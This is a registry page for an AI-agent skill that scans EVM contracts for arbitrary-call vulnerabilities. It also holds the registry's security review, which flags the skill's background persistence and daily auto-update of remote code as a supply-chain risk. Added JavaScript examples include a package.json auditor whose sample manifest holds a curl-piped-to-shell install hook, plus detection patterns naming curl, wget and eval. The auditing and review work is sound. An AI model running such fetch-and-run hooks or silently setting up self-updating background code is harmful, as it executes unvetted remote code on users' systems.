
BYOCB ArbInjectionSkill

Author: CryptoToolDev · GitHub · v1.0.0
cross-platform · ⚠ suspicious
Total downloads: 1372
Favorites: 0
Current installs: 0
Versions: 2
Install in OpenClaw
/install arb-injection
Description
BYOCB ArbInjectionSkill: Scan EVM smart contracts for arbitrary call injection vulnerabilities. Monitor chains in real-time or scan specific addresses.
Usage (SKILL.md)

BYOCB ArbInjectionSkill

⚠️ Educational Tool — This skill is designed for Solidity/blockchain security researchers and auditors. Intended for educational and authorized security research purposes only. Do not use to exploit vulnerabilities without explicit permission from contract owners.

Detects dangerous CALL/DELEGATECALL patterns that allow arbitrary call injection attacks.

How It Works

ArbInjectionSkill runs automatically in the background, monitoring blockchain(s) for newly deployed contracts. When a potential vulnerability is detected, you must notify the user via their connected messaging channel (Telegram, WhatsApp, Signal, Discord, etc.).

Install

git clone https://github.com/BringYourOwnBot/arb-injection.git
cd arb-injection
npm install

Running the Monitor

Start as a background session for continuous monitoring:

node index.js <chain> [--no-llm]

Chains: eth, bsc, base, arb, op, polygon, hyper

The monitor will:

  1. Subscribe to new blocks
  2. Detect contract deployments
  3. Scan bytecode for vulnerabilities
  4. Save findings to ./results/

Alerting Users

Critical requirement: When a CRITICAL or HIGH vulnerability is flagged, notify the user immediately.

Check for new findings periodically (via heartbeat or cron):

# Find findings from last 30 minutes
find ./results -name "*.md" -mmin -30

When new findings exist with verdict CRITICAL or HIGH:

  1. Read the .md report
  2. Verify it's not a known false positive (see below)
  3. Send alert via message tool to user's preferred channel

Example alert:

🚨 ArbInjection Alert: Potential vulnerability detected

Chain: BSC
Contract: 0x1234...abcd
Verdict: CRITICAL
Risk: Unprotected arbitrary CALL with user-controlled target

[Link to explorer]
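The heartbeat steps above (recency window, verdict gating, false-positive filtering, de-duplication, then the formatted message) as one function, added here as an example in JavaScript; it is not code from the arb-injection repository. The finding object shape ({ chain, address, verdict, risk, reportedAt }), the placeholder allowlist entry and the sample findings are assumptions constructed for this example, since the page does not show the tool's ./results JSON schema.

```javascript
'use strict';
// Added example, not the arb-injection project's code: the alert-gating steps as a pure
// function, so a heartbeat/cron handler can call it on whatever it read from ./results.
// The finding shape is an assumption; this page does not show the tool's real schema.

const ALERT_NOW = new Set(['CRITICAL', 'HIGH']); // verdict table: alert immediately
const REVIEW = new Set(['MEDIUM']);              // verdict table: review, alert only if confirmed

// Lower-cased so checksum casing does not matter. The entry is a placeholder for this example;
// a real allowlist holds the canonical per-chain addresses of Multicall3, Permit2, etc.
const KNOWN_SAFE = new Set(['0x0000000000000000000000000000000000000001']);

function gateFindings(findings, { now, windowMinutes = 30, knownSafe = KNOWN_SAFE, seen = new Set() }) {
  const cutoff = now - windowMinutes * 60 * 1000;
  const alert = [], review = [];
  for (const f of findings) {
    const addr = f.address.toLowerCase();
    const key = `${f.chain}:${addr}`;
    if (Date.parse(f.reportedAt) < cutoff) continue; // older than the polling window
    if (knownSafe.has(addr)) continue;               // documented false positive
    if (seen.has(key)) continue;                     // already surfaced; do not re-alert on every poll
    if (ALERT_NOW.has(f.verdict)) { seen.add(key); alert.push(f); }
    else if (REVIEW.has(f.verdict)) { seen.add(key); review.push(f); }
    // LOW / SAFE: nothing to do
  }
  return { alert, review };
}

// Renders the message in the format shown above. explorerBase is chosen per chain by the caller.
function formatAlert(f, explorerBase) {
  const short = `${f.address.slice(0, 6)}...${f.address.slice(-4)}`;
  return [
    '🚨 ArbInjection Alert: Potential vulnerability detected', '',
    `Chain: ${f.chain}`, `Contract: ${short}`, `Verdict: ${f.verdict}`, `Risk: ${f.risk}`, '',
    `${explorerBase}/address/${f.address}`,
  ].join('\n');
}

// Constructed sample findings (not real scan output); NOW is fixed so the run is deterministic.
const NOW = Date.parse('2024-01-01T12:00:00Z');
const SAMPLE_FINDINGS = [
  { chain: 'BSC', address: '0x1234567890abcdef1234567890abcdef1234abcd', verdict: 'CRITICAL',
    risk: 'Unprotected arbitrary CALL with user-controlled target', reportedAt: '2024-01-01T11:50:00Z' },
  { chain: 'ETH', address: '0x0000000000000000000000000000000000000001', verdict: 'HIGH',
    risk: 'DELEGATECALL with user-controlled target', reportedAt: '2024-01-01T11:55:00Z' }, // allowlisted
  { chain: 'BASE', address: '0xabcdefabcdefabcdefabcdefabcdefabcdefabcd', verdict: 'CRITICAL',
    risk: 'Unprotected arbitrary CALL with user-controlled target', reportedAt: '2024-01-01T10:00:00Z' }, // stale
  { chain: 'ARB', address: '0xfeedfeedfeedfeedfeedfeedfeedfeedfeedfeed', verdict: 'MEDIUM',
    risk: 'CALL target loaded from storage', reportedAt: '2024-01-01T11:59:00Z' },
  { chain: 'OP', address: '0xdeaddeaddeaddeaddeaddeaddeaddeaddeaddead', verdict: 'LOW',
    risk: 'STATICCALL with user-controlled target', reportedAt: '2024-01-01T11:59:00Z' },
];

const seen = new Set(); // persist this between polls (e.g. a JSON file) so restarts do not re-alert
const first = gateFindings(SAMPLE_FINDINGS, { now: NOW, seen });
for (const f of first.alert) console.log(formatAlert(f, 'https://bscscan.com'));
```

With the sample input only the BSC finding is alerted: the ETH one is allowlisted, the BASE one is outside the 30-minute window, the ARB one lands in the review list, and the OP one is LOW. Calling the function again with the same `seen` set returns nothing, which is what stops a cron poll from sending the same alert every 30 minutes.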

Manual Scan

Scan a specific contract on-demand:

node modules/scan-arbitrary-call.js <address> --rpc <chain>

Interpreting Results

Verdict    Action
CRITICAL   Alert user immediately
HIGH       Alert user immediately
MEDIUM     Review, alert if confirmed
LOW/SAFE   No alert needed

Results saved to ./results/ as .json and .md files.

False Positives

Do NOT alert for these patterns (safe by design):

  • Immutable DELEGATECALL targets (hardcoded address in bytecode)
  • EIP-1167 minimal proxies (clone pattern)
  • UUPS/Transparent proxies with access control
  • DEX callbacks (uniswapV3SwapCallback, etc.)
  • Known safe contracts: Multicall3, 1inch, Uniswap, Permit2

Verify before alerting: Check if the flagged CALL target is:

  • Hardcoded (immutable) → FALSE POSITIVE
  • From calldata/user input → REAL VULNERABILITY
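The two-way check above (hardcoded target → false positive, calldata-derived target → real vulnerability) and the EIP-1167 entry in the false-positive list can be exercised with a small taint pass over raw EVM runtime bytecode. The following is an added example written for this page in JavaScript; it is not code from the arb-injection repository, and its opcode coverage, the hand-assembled sample bytecodes and the verdict mapping are this example's own assumptions. It follows execution linearly (no jumps, no memory model), so it is a triage heuristic rather than the tool's analysis.

```javascript
'use strict';
// Added example, not the arb-injection project's code: a minimal taint check over EVM
// runtime bytecode for CALL/DELEGATECALL whose target address is derived from calldata.
// Single linear pass: no jump following and no memory model, so a triage heuristic only.

const CALLDATA = 'calldata'; // derived from msg.data, i.e. caller-controlled
const CONST = 'const';       // pushed as an immediate (PUSHn), i.e. hardcoded
const OTHER = 'other';       // environment, memory, storage or unknown

const merge = (a, b) =>
  a === CALLDATA || b === CALLDATA ? CALLDATA : a === CONST && b === CONST ? CONST : OTHER;

// Binary ops that propagate taint from either operand (ADD, SUB, AND, OR, SHR, ...).
const BINOPS = new Set([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x0a, 0x0b, 0x10, 0x11,
  0x12, 0x13, 0x14, 0x16, 0x17, 0x18, 0x1a, 0x1b, 0x1c, 0x1d]);
// opcode -> [pops, pushes, taint of pushed value]; 'prop' copies the first operand's taint.
const SIMPLE = {
  0x15: [1, 1, 'prop'], 0x19: [1, 1, 'prop'],                       // ISZERO, NOT
  0x33: [0, 1, OTHER], 0x34: [0, 1, OTHER], 0x35: [1, 1, CALLDATA], // CALLER, CALLVALUE, CALLDATALOAD
  0x36: [0, 1, OTHER], 0x37: [3, 0, OTHER],                         // CALLDATASIZE, CALLDATACOPY
  0x3d: [0, 1, OTHER], 0x3e: [3, 0, OTHER],                         // RETURNDATASIZE, RETURNDATACOPY
  0x50: [1, 0, OTHER], 0x51: [1, 1, OTHER], 0x52: [2, 0, OTHER],    // POP, MLOAD, MSTORE
  0x54: [1, 1, OTHER], 0x55: [2, 0, OTHER],                         // SLOAD, SSTORE
  0x56: [1, 0, OTHER], 0x57: [2, 0, OTHER],                         // JUMP, JUMPI (not followed)
  0x5a: [0, 1, OTHER], 0x5b: [0, 0, OTHER],                         // GAS, JUMPDEST
};
// opcode -> [name, operands popped]; the target address is always the second operand.
const CALLS = { 0xf1: ['CALL', 7], 0xf2: ['CALLCODE', 7], 0xf4: ['DELEGATECALL', 6], 0xfa: ['STATICCALL', 6] };
const HALTS = new Set([0x00, 0xf3, 0xfd, 0xfe, 0xff]); // STOP, RETURN, REVERT, INVALID, SELFDESTRUCT

function scanBytecode(hex) {
  const code = Buffer.from(hex.replace(/^0x/i, ''), 'hex');
  const stack = []; // taint labels only; the top of the stack is the last element
  const pop = () => (stack.length ? stack.pop() : OTHER);
  const findings = [];
  for (let pc = 0; pc < code.length; pc++) {
    const op = code[pc];
    if (op >= 0x60 && op <= 0x7f) { stack.push(CONST); pc += op - 0x5f; continue; } // PUSH1..PUSH32
    if (op >= 0x80 && op <= 0x8f) {                                                  // DUP1..DUP16
      const n = op - 0x7f;
      stack.push(stack.length >= n ? stack[stack.length - n] : OTHER);
      continue;
    }
    if (op >= 0x90 && op <= 0x9f) {                                                  // SWAP1..SWAP16
      const i = stack.length - 1, j = i - (op - 0x8f);
      if (j >= 0) [stack[i], stack[j]] = [stack[j], stack[i]];
      continue;
    }
    if (BINOPS.has(op)) { stack.push(merge(pop(), pop())); continue; }
    if (CALLS[op]) {
      const [name, pops] = CALLS[op];
      const args = Array.from({ length: pops }, () => pop()); // args[0] = gas, args[1] = address
      if (args[1] === CALLDATA) {
        findings.push({ pc, op: name, verdict: name === 'STATICCALL' ? 'LOW' : 'CRITICAL',
          reason: 'target address derived from calldata' });
      }
      stack.push(OTHER); // success flag
      continue;
    }
    if (HALTS.has(op)) break;
    const spec = SIMPLE[op];
    if (!spec) { stack.length = 0; continue; } // unmodelled opcode: discard the stack model rather than guess
    const [pops, pushes, taint] = spec;
    const first = pops ? pop() : OTHER;
    for (let i = 1; i < pops; i++) pop();
    for (let i = 0; i < pushes; i++) stack.push(taint === 'prop' ? first : taint);
  }
  const verdict = findings.some((f) => f.verdict === 'CRITICAL') ? 'CRITICAL'
    : findings.length ? 'LOW' : 'SAFE';
  return { verdict, findings };
}

// Hand-assembled sample runtime bytecodes for this example (constructed, not real deployments).
const ANY = '000000000000000000000000000000000000dead'; // placeholder 20-byte address
const MASK = 'ff'.repeat(20);                           // uint160 mask Solidity applies to addresses
// retLen retOff argsLen argsOff value | CALLDATALOAD(4) AND mask -> target | GAS CALL POP STOP
const VULN_CALL = '0x' + '6000'.repeat(5) + '600435' + '73' + MASK + '16' + '5af15000';
// same call, but the target is an immediate PUSH20: the "hardcoded (immutable)" false-positive case
const SAFE_CALL = '0x' + '6000'.repeat(5) + '73' + ANY + '5af15000';
// retLen retOff argsLen argsOff | CALLDATALOAD(4) -> target | GAS DELEGATECALL POP STOP
const VULN_DELEGATE = '0x' + '6000'.repeat(4) + '600435' + '5af45000';
// EIP-1167 minimal proxy runtime code: DELEGATECALL to an implementation embedded as PUSH20
const EIP1167_CLONE = '0x363d3d373d3d3d363d73' + ANY + '5af43d82803e903d91602b57fd5bf3';

for (const [name, code] of Object.entries({ VULN_CALL, SAFE_CALL, VULN_DELEGATE, EIP1167_CLONE })) {
  console.log(name, JSON.stringify(scanBytecode(code)));
}
```

The two vulnerable samples are flagged CRITICAL at the CALL and DELEGATECALL opcodes; the hardcoded-target variant and the EIP-1167 clone come back SAFE because their target reaches the call as a PUSH20 immediate. Real contracts route the decoded address through memory, jumps and ABI-decoding helpers, so a production scanner needs control-flow and memory tracking on top of this; the point here is the decision rule, not the coverage.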

Environment

Optional .env file:

ANTHROPIC_API_KEY=sk-ant-...   # For LLM deep analysis
BYBOB_OUTPUT=/custom/path      # Override results directory

Maintenance

Daily update required. Detection patterns and fixes are pushed frequently.

cd /path/to/arb-injection
git pull origin main
npm install  # If package.json changed

Schedule daily update check (09:00):

{
  "schedule": { "kind": "cron", "expr": "0 9 * * *" },
  "payload": { "kind": "systemEvent", "text": "ArbInjectionSkill daily update: git pull and npm install" },
  "sessionTarget": "main"
}

Source

Repository: https://github.com/BringYourOwnBot/arb-injection
Part of the BYOCB (Bring Your Own ClawdBot) skill collection.

Safe-use recommendations

This skill looks like a legitimate EVM-scanning tool, but the SKILL.md asks you to clone and run third-party Node code and to notify external messaging channels, while the registry metadata declares no install steps, binaries, or credentials. Before installing or running it:

  1. Review the GitHub repository and package.json for malicious postinstall scripts or unexpected network calls.
  2. Run the code in an isolated environment (VM or container) and inspect index.js and any module that sends network requests.
  3. Do not provide messaging API tokens or other secrets until you have verified how alerts are delivered.
  4. Prefer running scans manually, or under your own monitored service, rather than allowing silent background or auto-update behavior.
  5. Ask the publisher to update the registry metadata to list the required binaries (git, node, npm), the required environment variables, and an install spec, or to provide a vetted package or release.

If you cannot audit the repository, treat this skill as high-risk and do not grant it persistent or credentialed access.
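Step (1) above can be partly mechanised before anything is installed. The following is an added example in JavaScript, not code from the arb-injection repository: it audits a parsed package.json for npm lifecycle hooks (commands that `npm install` runs automatically) and for dependencies pulled from git, http or local paths instead of the registry. The sample manifests are constructed for the example and say nothing about the real repository's contents.

```javascript
'use strict';
// Added example, not the arb-injection project's code: a pre-install check of a parsed
// package.json for install-time hooks and non-registry dependency sources. The sample
// manifests below are constructed; they are not the repository's real package.json.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];
// Fragments that should not normally appear in an install hook of a scanning tool.
const SUSPICIOUS = [/\bcurl\b/, /\bwget\b/, /https?:\/\//, /\bbase64\b/, /\beval\b/, /node\s+-e\b/, /\bchmod\b/];
// git/http/file specs and "user/repo" GitHub shorthand bypass the registry's published tarballs.
const NON_REGISTRY = /^(git\+|git:|github:|ssh:|https?:|file:)|^[\w.-]+\/[\w.-]+(#.*)?$/;

function auditManifest(pkg) {
  const scripts = pkg.scripts || {};
  const hooks = LIFECYCLE_HOOKS
    .filter((name) => scripts[name])
    .map((name) => ({ name, cmd: scripts[name], suspicious: SUSPICIOUS.some((re) => re.test(scripts[name])) }));
  const remoteDeps = [];
  for (const field of ['dependencies', 'devDependencies', 'optionalDependencies']) {
    for (const [dep, spec] of Object.entries(pkg[field] || {})) {
      if (NON_REGISTRY.test(spec)) remoteDeps.push({ field, dep, spec });
    }
  }
  // block: something executes or downloads code outside the registry; review: a hook exists at all
  const verdict = hooks.some((h) => h.suspicious) || remoteDeps.length ? 'block'
    : hooks.length ? 'review' : 'ok';
  return { hooks, remoteDeps, verdict };
}

// Constructed manifests for the example (example.invalid is a reserved, non-resolving domain).
const SAMPLE_PKG = {
  name: 'example-scanner', version: '1.0.0',
  scripts: { start: 'node index.js', postinstall: 'curl -s https://example.invalid/setup.sh | sh' },
  dependencies: { ethers: '^6.0.0', helper: 'git+https://example.invalid/helper.git' },
};
const CLEAN_PKG = {
  name: 'example-scanner', version: '1.0.0',
  scripts: { start: 'node index.js' }, dependencies: { ethers: '^6.0.0' },
};

console.log(JSON.stringify(auditManifest(SAMPLE_PKG), null, 2));
console.log(auditManifest(CLEAN_PKG).verdict);
```

Run this against the cloned repository's package.json (and the package.json of anything in the lockfile you do not recognise) before `npm install`. If the only reason for a `review` verdict is a hook such as `prepare` that runs a build, `npm ci --ignore-scripts` installs without executing any lifecycle script; `npm ci` requires a committed package-lock.json, which is itself worth insisting on for a tool that is meant to self-update daily.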
Functional analysis
Type: OpenClaw Skill · Name: BYOCB ArbInjectionSkill · Developer: CryptoToolDev · Version: 1.0.0 · Description: OpenClaw Agent Skill

The skill is classified as suspicious because of its high-privilege capabilities and supply-chain risk. Specifically, SKILL.md instructs the OpenClaw agent to schedule a daily cron job that runs `git pull origin main` and `npm install` from https://github.com/BringYourOwnBot/arb-injection. Although framed as maintenance, this gives the skill a persistent self-update channel: it can fetch and execute new code from a remote repository without any further explicit user consent, which is a significant supply-chain exposure. The skill is also instructed to run as a "background session" for continuous monitoring, implying persistence, and to use a `message` tool for external communication (alerting).
Capability assessment
Purpose & Capability
The description (scan/monitor EVM contracts) is consistent with the runtime instructions. However, the skill metadata declares no required binaries or install steps, while SKILL.md explicitly requires git, node, npm and a GitHub repository. The missing declaration of those runtime requirements is an inconsistency.
Instruction Scope
The instructions tell the agent to git clone a repository, npm install, run node index.js as a background monitor, read and write ./results/, periodically check results, and notify users via messaging channels. Those steps involve network downloads, code execution, filesystem writes, and external notifications — all beyond what the metadata describes and granting substantial runtime discretion.
Install Mechanism
Although the registry lists no install spec, SKILL.md instructs cloning https://github.com/BringYourOwnBot/arb-injection.git and running npm install. That directs the agent to fetch and execute third-party code, which is a higher-risk install path and should have been declared in the registry or curated. An explicit install flow in SKILL.md with no install manifest in the registry is inconsistent.
Credentials
The metadata declares no required env vars or credentials, but SKILL.md references an optional ANTHROPIC_API_KEY and suggests notifying users over channels (Telegram/WhatsApp/Signal/Discord) without specifying required tokens. This mismatch leaves unclear what secrets the skill needs and how they will be used — and the instructions ask the agent to access and possibly transmit findings externally.
Persistence & Privilege
The skill metadata does not set always:true or other persistence flags, yet the instructions assume continuous background monitoring, cron/heartbeat checks, and a daily auto-update git pull/npm install. That indicates intended persistent behavior not reflected in the registry privileges, increasing risk if the agent were to autonomously implement persistence.
How to use
  1. Make sure OpenClaw is installed (local or Docker deployment)
  2. Type the install command in the chat box: /install arb-injection
  3. After installation, call the Skill by name or trigger it with /arb-injection
  4. Provide the required inputs per the Skill's parameter description to get structured output
Version history
v1.0.0
Initial public release.
  • Scan EVM smart contracts for arbitrary call injection vulnerabilities.
  • Real-time monitoring of blockchain contract deployments on major EVM chains.
  • Immediate user alerts for CRITICAL and HIGH severity findings.
  • Manual scan capability for specific addresses.
  • Built-in false positive detection for common safe patterns and known contracts.
  • Results saved to local directory for review and alerting workflows.
v0.1.0
  • Initial release of arb-injection skill for scanning EVM contracts for arbitrary call injection vulnerabilities.
  • Monitors supported chains in real-time or allows manual scanning of specific contract addresses.
  • Automatically detects and reports dangerous CALL/DELEGATECALL patterns.
  • Critical or high-severity findings require immediate alert to the user via their preferred messaging channel.
  • Built-in support for result filtering and false positive reduction, especially for proxy and DEX-related contracts.
  • Easy install and update instructions provided for ongoing maintenance.
Metadata
Slug: arb-injection
Version: 1.0.0
License: not listed
Total installs: 0
Current installs: 0
Versions: 2
FAQ

What is BYOCB ArbInjectionSkill?

BYOCB ArbInjectionSkill: Scan EVM smart contracts for arbitrary call injection vulnerabilities. Monitor chains in real-time or scan specific addresses. It is an AI Agent Skill plugin for Claude Code / OpenClaw, with 1372 downloads to date.

How do I install BYOCB ArbInjectionSkill?

Run the command "/install arb-injection" in the OpenClaw or Claude Code chat box for one-click installation; no additional configuration is needed.

Is BYOCB ArbInjectionSkill free?

Yes, BYOCB ArbInjectionSkill is completely free (open source) and can be freely downloaded, installed and used.

Which platforms does BYOCB ArbInjectionSkill support?

BYOCB ArbInjectionSkill runs cross-platform, in any environment where OpenClaw / Claude Code is deployed.

Who developed BYOCB ArbInjectionSkill?

Developed and maintained by CryptoToolDev (@cryptotooldev); current version v1.0.0.
